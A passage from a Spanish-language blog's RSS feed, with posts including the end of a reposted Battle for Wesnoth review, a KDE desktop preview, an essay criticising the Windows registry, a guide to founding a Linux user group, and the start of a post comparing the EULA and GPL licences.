son varios los efectos especiales que adornan este juego: el ya mencionado combate, movimiento, efectos de la interfaz de usuario... todos ellos elegidos con muy buen criterio, que ya es suficiente. No vamos a otorgar ningún premio especial al sonido, pero al menos no se hace tan insufriblemente insoportable como para querer olvidarnos del juego para siempre jamás, por el bien de nuestros pabellones auditivos.&lt;/p&gt; &lt;p&gt; &lt;/p&gt;&lt;table wbid="cw46010362d70c5" align="right" border="0" cellpadding="0" cellspacing="2" width="150"&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td&gt;&lt;a href="javascript:imagenMML%20('cw46010362d70c5');"&gt;&lt;img alt="The Battle for Wesnoth (PC)" src="http://plataforma.meristation.com/EPORTAL_IMGS/GENERAL/juegos/PC-Estrategia/b6/IMG-cw46010362d70c5/wesnoth10pe.jpg" wbid="cw46010362d70c5" link="true" align="right" border="0" height="113" width="150" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt; &lt;td class="fecha" id="footer" align="center"&gt;The Battle for Wesnoth&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;Si recordáis que hace escasos renglones mencionaba uno de los fallos en el sonido, ahora diré cuál es el segundo. La ausencia total de voces, y que espero ver solventada en futuras versiones. Suponiendo que se pretenda, además, traducirlas a los distintos idiomas, como se hiciera en su momento con los textos, no sería de extrañar que se permitiera a los aficionados a prestar su voz para incluirla en el juego. &lt;p&gt;Si hay alguien interesado, que vaya preparando sus mejores gritos de guerra élficos o su mejor voz de líder, por si acaso deciden dar a los personajes un poquito más de personalidad por medio de diálogos completamente hablados. No voy a decir que no se echan de menos estas voces, pero seamos sinceros, tampoco nos van a evitar jugar a un título del que ya hemos enumerado tantas virtudes... ¿verdad?.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Jugabilidad&lt;/strong&gt;&lt;br /&gt;&lt;/p&gt;&lt;table wbid="cw460103633472f" align="right" border="0" cellpadding="0" cellspacing="2" width="150"&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td&gt;&lt;a href="javascript:imagenMML%20('cw460103633472f');"&gt;&lt;img alt="The Battle for Wesnoth (PC)" src="http://plataforma.meristation.com/EPORTAL_IMGS/GENERAL/juegos/PC-Estrategia/b6/IMG-cw460103633472f/wesnoth04pe.jpg" wbid="cw460103633472f" link="true" align="right" border="0" height="113" width="150" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt; &lt;td class="fecha" id="footer" align="center"&gt;The Battle for Wesnoth&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;Siguiendo el principio de simplicidad, la jugabilidad no podía llevarlo al jugador de mejor manera. Cada turno podremos mover todas nuestras tropas según su atributo de movimiento y dependiendo del terreno este se podrá ver reducido. Cada turno tendremos la posibilidad de atacar con alguno de nuestros atacas, generalmente dos, a alguna de las tropas enemigas adyacentes. Y cada turno podremos reclutar nuevas tropas en las fortalezas. ¿Os suena raro?, vamos a explicarlo todo con pelos y señales.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="msnoticia"&gt;El movimiento es tan simple como seleccionar la unidad que queremos mover y seguidamente el hexágono al que queremos que se mueva. En ese instante nos aparecerá una línea señalando la ruta a seguir, que suele ser la más rápida pero no siempre es la que nosotros queremos, por motivos tácticos. Si se hiciese necesario más de un simple turno para llegar al objetivo, podremos ver en la ruta indicada el número de turnos que tardaremos, e incluso en que punto nos hallaremos al final de cada uno de los mismos mientras dure el viaje. Muy útil. &lt;p&gt;Si una tropa no mueve absolutamente ni un hexágono en un turno completo, recuperará parte de su vida perdida y, hasta aquí, el movimiento no tiene más secretos, salvo que es importante recordar que tropas son más rápidas en que terrenos a fin de realizar movimientos estratégicos eficientes. Pero no todo en el mapa son bosques, lagos, montañas o praderas... eso que ven mis ojos son, ¿edificios? Pues sí, lo son, y quizás son a su vez el único y más importante recurso estratégico del juego. &lt;/p&gt; &lt;p&gt; &lt;/p&gt;&lt;table wbid="cw460103ebc8f2f" align="center" border="0" cellpadding="0" cellspacing="2" width="380"&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td&gt;&lt;a href="javascript:imagenMML%20('cw460103ebc8f2f');"&gt;&lt;img alt="The Battle for Wesnoth (PC)" src="http://plataforma.meristation.com/EPORTAL_IMGS/GENERAL/juegos/PC-Estrategia/b6/IMG-cw460103ebc8f2f/wesnoth14pe.jpg" wbid="cw460103ebc8f2f" link="true" align="middle" border="0" height="285" width="380" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt; &lt;td class="fecha" id="footer" align="center"&gt;The Battle for Wesnoth (PC)&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt; &lt;p&gt;Los edificios tienen dos funciones claras. Cuando una tropa acaba su turno en un edificio recuperará un poquito de la vitalidad perdida en combate, pero además, si una tropa entra en un hexágono de edificio, ocupará ese edificio para nuestra facción. Podremos ver una banderita con el color de nuestro ejército ondeando en el tejado de la casa ocupada y, a partir de entonces, cada turno se nos reportará una cantidad de monedas de oro.&lt;/p&gt; &lt;p&gt; &lt;/p&gt;&lt;table wbid="cw4601036322f9c" align="right" border="0" cellpadding="0" cellspacing="2" width="150"&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td&gt;&lt;a href="javascript:imagenMML%20('cw4601036322f9c');"&gt;&lt;img alt="The Battle for Wesnoth (PC)" src="http://plataforma.meristation.com/EPORTAL_IMGS/GENERAL/juegos/PC-Estrategia/b6/IMG-cw4601036322f9c/wesnoth03pe.jpg" wbid="cw4601036322f9c" link="true" align="right" border="0" height="113" width="150" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt; &lt;td class="fecha" id="footer" align="center"&gt;The Battle for Wesnoth (PC)&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;Se hace imprescindible ocupar gran cantidad de edificios, y no dejar que el enemigo haga lo propio. No es que seamos tacaños, es que ese oro es necesario para reclutar nuevas tropas a nuestro bando y poder hacer frente a las posibles bajas que vayamos sufriendo en el transcurso de la batalla. El reclutamiento es bastante sencillo, se realiza en las fortalezas y sólo tiene una condición, que nuestro líder se encuentre en el torreón principal de la misma. Si esto se cumple, podremos reclutar una tropa por cada hexágono que represente el patio de armas del castillo. &lt;p&gt; &lt;/p&gt;También es posible de esta manera, introducir en la confrontación tropas veteranas de anteriores encuentros, cuya experiencia pueda desnivelar la balanza de la guerra a nuestro favor. Esto es debido a que las tropas ganan experiencia cada vez que combaten, y mucha más ganarán si derrotan al oponente. Una vez acu&lt;/span&gt;&lt;a href="javascript:imagenMML%20('cw46010362c9131');"&gt;&lt;span class="msnoticia"&gt;&lt;/span&gt;&lt;/a&gt;&lt;a href="javascript:imagenMML%20('cw4601036314b25');"&gt;&lt;img alt="The Battle for Wesnoth (PC)" src="http://plataforma.meristation.com/EPORTAL_IMGS/GENERAL/juegos/PC-Estrategia/b6/IMG-cw4601036314b25/wesnoth18pe.jpg" wbid="cw4601036314b25" link="true" align="right" border="0" height="113" width="150" /&gt;&lt;/a&gt;&lt;span class="msnoticia"&gt;&lt;a href="javascript:imagenMML%20('cw46010362c9131');"&gt;&lt;img alt="The Battle for Wesnoth (PC)" src="http://plataforma.meristation.com/EPORTAL_IMGS/GENERAL/juegos/PC-Estrategia/b6/IMG-cw46010362c9131/wesnoth08pe.jpg" wbid="cw46010362c9131" link="true" align="right" border="0" height="113" width="150" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class="msnoticia"&gt;mulada cierta cantidad de tan deseada veteranía, la tropa aumentará de rango, y en muchas ocasiones seremos nosotros los responsables de elegir entre dos o tres opciones de mejora&lt;/span&gt;&lt;span class="msnoticia"&gt;&lt;/span&gt;&lt;span class="msnoticia"&gt; para nuestros subordinados. Sabemos movernos, atacar y reclutar tropas, para completar este pequeño aprendizaje os diré que hay tropas con efectos especiales, como los chamanes que pueden curar a los aliados adyacentes, o algunas que se regeneran, como los trolls. &lt;p&gt; &lt;/p&gt;Así que sólo nos falta saber como se gana una batalla. Bien, eso depende... de que batalla sea. No es broma, ya que al&lt;/span&gt;&lt;span class="msnoticia"&gt;&lt;/span&gt;&lt;span class="msnoticia"&gt; inicio de cada escenario nos habrán asignado unos &lt;/span&gt;&lt;span class="msnoticia"&gt;&lt;/span&gt;&lt;span class="msnoticia"&gt;objetivo&lt;/span&gt;&lt;span class="msnoticia"&gt;&lt;/span&gt;&lt;span class="msnoticia"&gt;s. Pueden ir desde derrotar al general del ejército enemigo, llegar con nuestro&lt;/span&gt;&lt;span class="msnoticia"&gt;&lt;/span&gt;&lt;span class="msnoticia"&gt; general a cierto p&lt;/span&gt;&lt;span class="msnoticia"&gt;&lt;/span&gt;&lt;span class="msnoticia"&gt;unto o recupe&lt;/span&gt;&lt;span class="msnoticia"&gt;&lt;/span&gt;&lt;span class="msnoticia"&gt;rar un objeto, sobrevivir cierto número de turnos o hasta incluso derrotar a más de un general de más de un&lt;/span&gt;&lt;span class="msnoticia"&gt;&lt;/span&gt;&lt;span class="msnoticia"&gt; ejército enemigo.&lt;/span&gt;&lt;span class="msnoticia"&gt;&lt;/span&gt;&lt;span class="msnoticia"&gt; &lt;p&gt;Sí, en ocasiones nos veremos en clara inferioridad numérica y rodeados por dos o más malvados comandantes que sin piedad lanzan sus tropas contra las nuestras. También en ocasiones aparecerán aliados para socorrernos y prestarnos sus tropas de manera que hacer frente al enemigo se convierta en tarea más sencilla. En el modo multijugador es posible jugar con las alianzas que se estipulen al comienzo de la partida y con cualquier bando, así que variedad de escenarios hay, a decir verdad, pero lo más importante, también hay variedad de campañas.&lt;/p&gt;&lt;/span&gt;&lt;span class="msnoticia"&gt;Serán 6 las campañas a lo largo de las cuales tendremos que probar nuestra valía como generales en Wesnoth. Y esas son solamente las oficiales que se incluyen con el juego, porque hay posibilidad de obtener más campañas gratuitamente o incluso, si alguien se ve con la habilidad suficiente, crearlas. Cada una de ellas nos proporciona una historia completamente original, aunque la duración de cada una varía. En la campaña considerada principal, Heredero al Trono, tomaremos el rol del joven Konrad, que al mando de los rebeldes luchará por reclamar su legitimidad arrebatada por la reina Asheviere y sus secuaces. Todo ellos a lo largo de 24 escenarios diferentes, ni más ni menos. &lt;p&gt; &lt;/p&gt;&lt;table wbid="cw460105317721b" align="right" border="0" cellpadding="0" cellspacing="2" width="150"&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td&gt;&lt;a href="javascript:imagenMML ('cw460105317721b');"&gt;&lt;img link="true" alt="The Battle for Wesnoth (PC)" src="http://plataforma.meristation.com/EPORTAL_IMGS/GENERAL/juegos/PC-Estrategia/b6/IMG-cw460105317721b/wesnoth20pe.jpg" wbid="cw460105317721b" align="right" border="0" height="106" width="150" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt; &lt;td class="fecha" id="footer" align="center"&gt;The Battle for Wesnoth&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;En la campaña La Invasión del Este, seremos el oficial Gweddry del ejército del reino de Wesnoth, que tratará por todos los medios, salvar a sus paisanos de la invasión de los No Muertos, durante 17 apasionantes episodios. El Ascenso de Wesnoth nos mostrará como el Príncipe Haldric se convertirá en el fundador y primer rey de Wesnoth, y el Una Historia de Dos Hermanos seremos testigos del rapto del nuestro hermano a manos de un malvado mago. La última de las campañas oficiales es La Guardia del Sur, donde el joven caballero Deovan será asignado como comandante de un grupo conocido como por ese nombre, la Guardia del Sur. &lt;p&gt;Como podéis ver, hay opciones para todos. De hecho, donde pone para todos, es realmente para todos, porque hay que destacar que The Battle for Wesnoth está disponible para AmigaOS 4, BeOS, FreeBSD, Linux, Mac OS X, NetBSD, OpenBSD, Solaris, RISC OS y, por supuesto Microsoft Windows. Esto significa que no importa que vuestro amigo use otro sistema operativo, ya que podréis jugar tan tranquilamente, independientemente de la plataforma de cada uno. Es una gran noticia para todos que podamos disfrutar de este juego sea cuál sea el sistema operativo que usemos.&lt;/p&gt; &lt;p&gt;&lt;strong&gt; &lt;table wbid="cw460103ebb8950" align="center" border="0" cellpadding="0" cellspacing="2" width="380"&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td&gt;&lt;a href="javascript:imagenMML%20('cw460103ebb8950');"&gt;&lt;img alt="The Battle for Wesnoth (PC)" src="http://plataforma.meristation.com/EPORTAL_IMGS/GENERAL/juegos/PC-Estrategia/b6/IMG-cw460103ebb8950/wesnoth05pe.jpg" wbid="cw460103ebb8950" link="true" align="middle" border="0" height="285" width="380" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt; &lt;td class="fecha" id="footer" align="center"&gt;The Battle for Wesnoth&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;Conclusión&lt;/strong&gt;&lt;br /&gt;&lt;/p&gt;&lt;table wbid="cw460105316b9fe" align="right" border="0" cellpadding="0" cellspacing="2" width="150"&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td&gt;&lt;a href="javascript:imagenMML ('cw460105316b9fe');"&gt;&lt;img link="true" alt="The Battle for Wesnoth (PC)" src="http://plataforma.meristation.com/EPORTAL_IMGS/GENERAL/juegos/PC-Estrategia/b6/IMG-cw460105316b9fe/wesnoth19pe.jpg" wbid="cw460105316b9fe" align="right" border="0" height="119" width="150" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt; &lt;td class="fecha" id="footer" align="center"&gt;The Battle for Wesnoth&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;David White y sus más de 300 colaboradores, en mayor o menor grado, quisieron un día crear un juego sencillo pero altamente jugable. Si nos hubieran prometido que lo conseguirían, a día de hoy nadie podría quitarles ni un ápice de verdad a aquella promesa, y aunque no nos hicieron tal, hoy, casi un millón de jugadores, pueden agradecerles sinceramente que nos hayan llevado durante un instante a ese fantástico mundo que es Wesnoth. &lt;p&gt;Ojalá sean muchos años los que podamos disfrutar de este título y sus mejoras, porque pocas veces se consigue lo que parece más sencillo, pero es verdaderamente lo más complicado: fijarse un objetivo y cumplirlo tan fielmente que sea posible mirar un juego, a simple vista tan poco sofisticado, y decir con la cabeza bien alta, no le falta, casi nada. Nos vemos en Wesnoth.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Lo mejor&lt;/strong&gt;&lt;br /&gt;&lt;em&gt;• Gratis/Libre y con un desarrollo altamente activo.&lt;br /&gt;• Busca sencillez y la consigue.&lt;br /&gt;• Variedad en gráficos y campañas.&lt;/em&gt;&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Lo peor&lt;/strong&gt;&lt;br /&gt;&lt;em&gt;• Ausencia total de voces.&lt;br /&gt;• Las traducciones son parciales.&lt;/em&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;em&gt;&lt;/em&gt;&lt;/p&gt;&lt;/span&gt;&lt;p&gt;&lt;b&gt;&lt;span class="mstexto9"&gt;Por: &lt;/span&gt;&lt;span style="font-family:Arial, Helvetica, sans-serif;font-size:85%;color:#000000;"&gt;&lt;a href="http://www.meristation.com/foros/profile.php?mode=viewprofile&amp;amp;u=390902" target="blank" class="mslink9"&gt;José Álvaro Sañudo Díaz&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;span class="msnoticia"&gt;&lt;/span&gt;</description><link>http://okltsmash.blogspot.com/2008/01/juego-battle-for-wesnoth.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-7567918150505656062</guid><pubDate>Fri, 04 Jan 2008 02:43:00 +0000</pubDate><atom:updated>2008-01-03T20:53:37.375-06:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">desktop kde</category><title>Yet another KDE 3.5 Desktop</title><description>Como al parecer no hubo demasiada popularidad en mi anterior desktop, paso a dejar otro, es tan solo un preview así que dejen sus sugerencias (que muy probablemente no tome en cuenta xD)...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://descargas.ltsmash.org/screens/darch-kmenu.png"&gt;Menu KDE/Wallpaper&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://descargas.ltsmash.org/screens/darch-firefox.png"&gt;Firefox&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://descargas.ltsmash.org/screens/darch-apps.png"&gt;Messenger/Terminal&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://descargas.ltsmash.org/screens/darch-music.png"&gt;AmaroK (música)&lt;/a&gt;</description><link>http://okltsmash.blogspot.com/2008/01/yes-another-kde-35-desktop.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-7048908753495369276</guid><pubDate>Fri, 04 Jan 2008 00:38:00 +0000</pubDate><atom:updated>2008-01-03T18:39:38.383-06:00</atom:updated><title>El error histórico de Microsoft</title><description>&lt;p style="font-weight: bold; text-align: center;"&gt;&lt;span style="font-size:130%;"&gt;El error histórico de Microsoft&lt;/span&gt;&lt;/p&gt; &lt;p&gt;En MS-DOS, como en UNIX, como en VMS, las aplicaciones se instalaban en un directorio, en el que uno colocaba todos los ejecutables, librerías, archivos de configuración, ficheros de datos, etc. que necesitara el programa para su funcionamiento. Esta metodología era bastante limpia porque permitía tener todo lo necesario en un único lugar del disco. MS-DOS era monousuario y monotarea, es decir, no había más que un usuario en el sistema (más bien el concepto de usuario no existía) y sólo podía ejecutar una aplicación en cada momento. Por tanto sólo había una configración posible, y bastaba con guardar la configuración en un archivo dentro del mismo directorio del programa. Si además la aplicación generaba documentos, como sucede por ejemplo con un procesador de texto, éstos podían guardarse en el mismo directorio también o, mejor, en otro diferente, lo que facilitaba la realización de copias de seguridad.&lt;/p&gt; &lt;p&gt;UNIX (antepasado de linux, por decirlo rápido aunque mal) fue desde el principio un sistema multiusuario y multitarea, de modo que tenía que resolver el problema de cómo guardar la configuración personal de cada usuario para cada programa. Para eso se ideó un tipo especial de archivo, cuyos nombres comenzaban por punto (.) que no aparecía por defecto al mirar los contenidos de un directorio; además cada usuario tenía (tiene) un directorio personal donde guardar sus archivos, incluídos los de configuración.&lt;/p&gt; &lt;p&gt;Este sistema tan simple tiene algunas ventajas que pasan desapercibidas sin una reflexión detenida. Por ejemplo, el tema de los permisos. Un usuario jamás tiene por qué tener permisos de escritura en el directorio donde está el programa con “sus cosas”. Sólo tiene que tener permiso de escritura en sus archivos y sus configuraciones, que cuelgan todos a partir de su directorio de usuario (en linux es /home/nombre-del-usuario). La otra ventaja es que un usuario no tiene por qué tener permiso de lectura (y mucho menos de modificación) de los directorios de los otros usuarios.&lt;/p&gt; &lt;p&gt;Cuando Microsoft desarrolló Windows tuvo que enfrentarse a nuevos problemas, para los que posiblemente reflexionó poco. Y alguna mente privilegiada de redmon pensó: “creemos el win.ini”, un archivo donde guardar la configuración de Windows. Y más adelante ¿por qué no creamos un servicio en el API de Windows para que los desarrolladores añadan la configuración de sus propios programas al win.ini, y así centralizamos todo? Hay que pensar que en su primera época Windows todavía era monousuario y su sistema de archivos (FAT) no permitía asignar permisos a los ficheros.&lt;/p&gt; &lt;p&gt;La cosa se complicó cuando llegó la idea multiusuario a Windows. El win.ini ya no servía, PORQUE SÓLO HABÍA UNO, y diferentes usuarios querían tener diferentes configuraciones. Para mayor desastre los desarrolladores se habían acostumbrado a meter sus configuraciones en el win.ini. Así que la misma mente privilegiada de redmon (u otra todavía más impresionante) dijo ¡Hágase el registro! El registro es una especie de base de datos donde se guardan todo tipo de configuraciones de hardware, de Windows, de programas y de usuario. Todo mezclado, como en el cambalache de Discépolo.&lt;/p&gt; &lt;p&gt;Más adelante (con Windows NT y luego con XP) se introdujo un nuevo sistema de archivos (NTFS) que permitía permisos en los ficheros, y se creó una infraestructura para que cada usuario tuviera su espacio propio, pero ya era demasiado tarde. El registro se había convertido en un auténtico monstruo, una estructura que crece en las máquinas Windows hasta el tamaño de muchos MB y es el verdadero culpable de que los Windows se vuelvan lentos como tortugas en el arranque al cabo de unos meses de uso.&lt;/p&gt; &lt;p&gt;Otra consecuencia sorprendente: un usuario de linux, o de Apple (puesto que MacOS está construído sobre UNIX) es que en estos sistemas se puede instalar un programa, en general, copiando los archivos a cualquier lado (aunque haya un sitio recomendado para colocarlos) y los programas FUNCIONAN sin más. En Windows, como todo el mundo sabe, esto no es posible (salvo casos muy raros, normalmente en programas que vienen del mundo linux). Los programas hay que INSTALARLOS. ¿Por qué? Sencillamente porque además de copiar archivos tienen que meter cosas en el registro.&lt;/p&gt; &lt;p&gt;Lo peor es que ya es demasiado tarde para cambiar los hábitos de los usuarios y los desarrolladores. Todo el mundo es capaz de escribir en el registro y muchísimos programas suponen que pueden escribir donde les parezca: por eso es tan fácil para un virus instalarse en el sistema. Con Windows Vista han hecho un tímido intento de prohibir por defecto y pedir permiso cuando alguien intenta escribir en el registro o en los directorios del sistema, pero las preguntas son tan frecuentes que los usuarios simplemente desactivan esa opción. Y vuelven a estar expuestos.&lt;/p&gt; &lt;p&gt;Es un desastre.&lt;/p&gt; &lt;p style="font-style: italic;"&gt;Autor: Francisco Serradilla, poeta y doctor en Informática. Su línea principal de investigación se refiere al desarrollo de Softbots (Robots Software) y Agentes Inteligentes en Internet.&lt;/p&gt;</description><link>http://okltsmash.blogspot.com/2008/01/el-error-histrico-de-microsoft.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>42</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-29707697615091628</guid><pubDate>Sun, 30 Dec 2007 01:32:00 +0000</pubDate><atom:updated>2007-12-30T13:32:21.821-06:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">gul linux howto</category><title>COMO hacer un Grupo-de-Usuarios-de-Linux (GUL)</title><description>&lt;span style="font-size:180%;"&gt;&lt;span style="font-weight: bold;"&gt;¿Qué es un LUG?&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;GNU/Linux es un movimiento mundial sin una estructura central, burocratizada o entidad para controlar, coordinar o dirigir sus objetivos. Mientras esta situación es una parte poderosa del sentido y calidad técnica de GNU/Linux como un sistema operativo de una computadora, puede jugar en contra para ubicar recursos humanos capacitados o educar usuarios.&lt;br /&gt;&lt;br /&gt;En gran medida un LUG local provee las respuestas a esta clase de cuestiones. Debido a que no hay una una corporación de GNU/Linux capaz de bindar informacion o soporte especializado, el LUG local cumple los mismos roles que una oficina regional de una gran corporación multinacional.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-size:130%;"&gt;Funciones de un LUG:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;Difusión:&lt;/span&gt;&lt;br /&gt;El LUG local juega un indispensable rol en promover el uso de GNU/Linux. Si una persona conoce acerca de GNU/Linux a través del esfuerzo de un LUG local, entonces esa persona, como un nuevo usuario GNU/Linux, tiene una gran ventaja: ella ya esta conciente de la existencia de una organización que la ayudará a instalar, configurar y mantener GNU/Linux. Por está razón, es importante que los LUGs locales promuevan GNU/Linux porque su difusión es efectiva, bien soportada y libre.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Educación:&lt;/span&gt;&lt;br /&gt;Podemos elegir el objetivo de educación simplemente porque no hay otra entidad local de la cual usuarios GNU/Linux puedan recibir educación con orientación técnica. Por otro lado un LUG puede compartir la capacitación laboral, ya que cada trabajador que expande sus habilidades en computación participando en un LUG local, es un trabajador menos que la empresa tiene que entrenar. Aún usando y administrando una PC GNU/Linux en casa, que no es lo mismo que administrar un data warehouse corporativo o sistemas de gran envergadura, es mucho más complejo, más reconfortante y más educativo que administrar una PC con Windows 95 en casa. Este objetivo no solo puede servir para capacitar laboralmente, sino que puede convertirse en un servicio a la comunidad, ya que como la tecnología de Información se vuelve una parte vital de la economía global, un LUG local puede introducir GNU/Linux en escuelas, pequeños negocios, organizaciones comunitarias y sociales, y otros entornos no corporativos. Esta tarea de promoción también ayuda al entrenamiento del público en general acerca de GNU/Linux como un sistema operativo estilo Unix libre, gratuito, etc. Como más y más de estas clase de organizaciones buscan establecer una presencia en Internet o proveer acceso remoto a sus trabajadores, estudiantes o miembros, se originan oportunidades para los LUGs locales de participar en la vida de su comunidad educándolos acerca de un sistema operativo libre y disponible gratuitamente. Esta clase de servicio a la comunidad permite al usuario medio de GNU/Linux emular la clase de generosidad que ha caracterizado a GNU/Linux y la comunidad de software libre desde un comienzo.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Soporte:&lt;/span&gt;&lt;br /&gt;La queja más frecuente de los nuevos usuarios de GNU/Linux, una vez que tienen instalado el sistema, es la empinada curva de aprendizaje que no es única de los GNU/Linux sino es una característica de todos los modernos Unix. Una vez que esa curva es alcanzada, nos encontramos con el poder y flexibilidad de un sistema operativo complejo. Un LUG local es el único recurso que un nuevo usuario tiene disponible para aplanar la curva de aprendizaje. Pero aún si un nuevo usuario GNU/Linux no conoce esto todavía, el necesita más que soporte técnico, el mundo de GNU/Linux y el software libre se mueven rápidamente. Los LUGs locales forman un invaluable conducto de información acerca de GNU/Linux. El movimiento GNU/Linux tiene recursos como GNU/Linux Journal y GNU/Linux Gazette , pero muchos usuarios desconocen estos recursos. El LUG local debe ser una fuente de información acerca de bugs reparados, problemas de seguridad, parches, nuevos kernels, etc. Información vital para usuarios nuevos y experimentados. Por otro lado los LUGs tienen la oportunidad de dar soporte a negocios y organizaciones locales. Este soporte tiene dos aspectos. Primero, pueden soportar organizaciones y negocios que quieren usar GNU/Linux como parte de su esfuerzo en Tecnolog?a de Información y computación. Segundo, pueden dar soporte a negocios y organizaciones locales que desarrollen para GNU/Linux, soporten o instalen GNU/Linux. Si los LUGs locales pueden jugar un rol en ayudar a usuarios de negocios a evaluar soluciones comerciales de GNU/Linux, entonces más vendedores de software se verán estimulados para considerar GNU/Linux en sus desarrollos y planificaciones.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Socialización:&lt;/span&gt;&lt;br /&gt;Compartir experiencias, formando amistades y generando admiración y respeto mutuo. La socialización en GNU/Linux, a diferencia del mundo real, puede ocurrir a través de listas de correo, Foros o quizas Usenet, pero la mejor forma de hacerlo es a través de seres humanos de carne y hueso y no por voces incorporadas de una lista de correo, Forum o grupo de Usenet.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;Actividades de un LUG&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Las dos maneras básicas que un LUG puede realizar las funciones descriptas anteriormente son: primero efectuar reuniones en un espacio físico y segundo comunicarse a través del ciberespacio. Se pueden efectuar reuniones sociales, presentaciones técnicas, Instalaciones y configuraciones de GNU/Linux, llevando a cabo actividades como enseñar a miembros acerca de GNU/Linux, comparar GNU/Linux con otros sistemas operativos, discutir las formas en que GNU/Linux puede ser promovido, discutir el negocio de un grupo de usuarios, comer, beber y ser felices.&lt;br /&gt;&lt;br /&gt;Pero el ingrediente masimportante son las ganas, persistencia y sobre todo un grupo Unido.&lt;br /&gt;&lt;br /&gt;Que sea todo por el Software Libre y las comunidades van a funcionar a trabajar. Pero es importante que los colegios y Universidades empieze esta aventura. No solo tu ganaras sino tu Colegio, Universidad, Localidad, Región y sobre todo el Pais.</description><link>http://okltsmash.blogspot.com/2007/12/como-hacer-un-grupo-de-usuarios-de.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-6118692306847200096</guid><pubDate>Sun, 30 Dec 2007 01:20:00 +0000</pubDate><atom:updated>2007-12-30T13:33:23.449-06:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">linux gnu windows ventajas desventajas</category><title>Más sobre ventajas y desventajas de GNU/Linux y Windows</title><description>Hablemos del enfrentamiento entre Windows vs. Linux. Conozcamos las ventajas y desventajas entre Microsoft y GNU Linux, los equivalentes de las aplicaciones de Microsoft en Linux, entre otros temas interesantes.&lt;br /&gt;&lt;br /&gt;En inglés EULA o End User License Agreement, es una licencia por la cual el uso de un producto sólo está permitido para un único usuario (el comprador).&lt;br /&gt;&lt;br /&gt;GNU GPL, (Licencia Pública General) es una licencia creada por la Free Software Foundation a mediados de los 80, y está orientada principalmente a proteger la libre distribución, modificación y uso de software.&lt;br /&gt;&lt;br /&gt;Su propósito es declarar que el software cubierto por esta licencia es software libre y protegerlo de intentos de apropiación que restrinjan esas libertades a los usuarios, http://www.gnu.org/.&lt;br /&gt;&lt;br /&gt;En meses pasados se llevó a cabo un estudio para determinar las diferencias entre la licencia utilizada por el sistema operativo Microsoft Windows XP (EULA) y la licencia utilizada por el software de código abierto, entre los que se incluyen Linux (GNU GPL)&lt;br /&gt;&lt;br /&gt;El estudio fue llevado por Cybercurse (http://www.cyber.com.au/) empresa líder en Australia que provee servicios TI enfocados en Unix, Linux, TCP/IP y Windows.&lt;br /&gt;&lt;br /&gt;Entre los aspectos más destacados de este estudio podemos citar que se reveló que mientras que la licencia EULA, pretende proteger a la empresa Microsoft, la licencia GNU GPL se enfoca más hacia los derechos del usuario.&lt;br /&gt;&lt;br /&gt;La licencia de Microsoft (EULA) tiene por objetivo limitar al usuario a tomar acciones, elecciones u opciones sobre el software, entre tanto que la GNU GPL se dedica a salvaguardar 